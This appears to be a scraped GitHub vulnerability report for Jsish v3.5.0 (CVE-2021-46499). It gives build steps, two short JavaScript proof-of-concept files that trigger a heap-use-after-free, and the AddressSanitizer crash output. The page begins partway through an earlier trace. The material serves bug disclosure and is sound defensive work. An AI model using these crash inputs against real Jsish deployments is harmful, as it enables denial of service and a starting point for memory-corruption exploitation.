    #2 0x5637795f6759 in jsi\_ObjArraySetDup src/jsiEval.c:1054
    #3 0x5637795f6759 in jsi\_ValueObjKeyAssign src/jsiEval.c:1079
    #4 0x5637795f6759 in jsiEvalCodeSub src/jsiEval.c:1303
    #5 0x5637795fd15e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x563779601274 in jsi\_evalStrFile src/jsiEval.c:2665
    #7 0x5637792f066a in Jsi\_Main src/jsiInterp.c:936
    #8 0x563779af503a in jsi\_main src/main.c:47
    #9 0x7f66650eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #10 0x563779284969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000006e84 is located 4 bytes inside of 32-byte region \[0x603000006e80,0x603000006ea0)
freed by thread T0 here:
    #0 0x7f6665d5d7a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5637792a56cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f6665d5dd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x5637792f5aa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:245 in jsi\_ValueCopyMove
Shadow bytes around the buggy address:
  0x0c067fff8d80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8d90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8da0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8db0: fa fa fd fd fd fd fa fa 00 00 04 fa fa fa 00 00
  0x0c067fff8dc0: 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
\=>0x0c067fff8dd0:\[fd\]fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8de0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8df0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e00: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
  0x0c067fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==99189\==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46499: Heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove · Issue #76 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_IncrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case1**

function JSEtest(assert)
{
  (arr.concat(\[\]), false, 'JSEtest');
}

var arr \= /x?y?z?/.exec("abcd");
arr\[arr\[arr\['JSEtest'\[arr\[1000\] \= 3\]\] \= 3\] \= 3\](arr.every(JSEtest), false, 'JSEtest');

**Test case2**

var list \= \[
  'aa',
  'bb',
  'cc',
  'dd',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + list.sort(function (\_str, position) {
  var s \= 'sort:' + list.sort(function (str, position) {
    var s \= 'shift:' + list.shift();
  }) + list.shift();
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==114358==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007060 at pc 0x556541bb6a68 bp 0x7ffd4e8abbc0 sp 0x7ffd4e8abbb0
READ of size 4 at 0x603000007060 thread T0
    #0 0x556541bb6a67 in Jsi\_IncrRefCount src/jsiValue.c:34
    #1 0x556541d0aab5 in Jsi\_ObjNewArray src/jsiObj.c:480
    #2 0x556541c75f14 in jsi\_ArrayFindSubCmd src/jsiArray.c:573
    #3 0x556541c75f14 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #4 0x556541c31818 in jsi\_FuncCallSub src/jsiProto.c:244
    #5 0x556541efb71a in jsiFunctionSubCall src/jsiEval.c:796
    #6 0x556541efb71a in jsiEvalFunction src/jsiEval.c:837
    #7 0x556541efb71a in jsiEvalCodeSub src/jsiEval.c:1264

    #8 0x556541f0f15e in jsi\_evalcode src/jsiEval.c:2204
    #9 0x556541f13274 in jsi\_evalStrFile src/jsiEval.c:2665
    #10 0x556541c0266a in Jsi\_Main src/jsiInterp.c:936
    #11 0x55654240703a in jsi\_main src/main.c:47
    #12 0x7f7e9588dbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #13 0x556541b96969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007060 is located 0 bytes inside of 32-byte region \[0x603000007060,0x603000007080)
freed by thread T0 here:
    #0 0x7f7e964fc7a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x556541bb76cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f7e964fcd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x556541c07aa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:34 in Jsi\_IncrRefCount
Shadow bytes around the buggy address:
  0x0c067fff8db0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8dc0: fd fd fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa
  0x0c067fff8dd0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8de0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8df0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
\=>0x0c067fff8e00: fd fd fd fd fa fa 00 00 00 00 fa fa\[fd\]fd fd fd
  0x0c067fff8e10: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8e20: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8e30: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
  0x0c067fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Tag

#ubuntu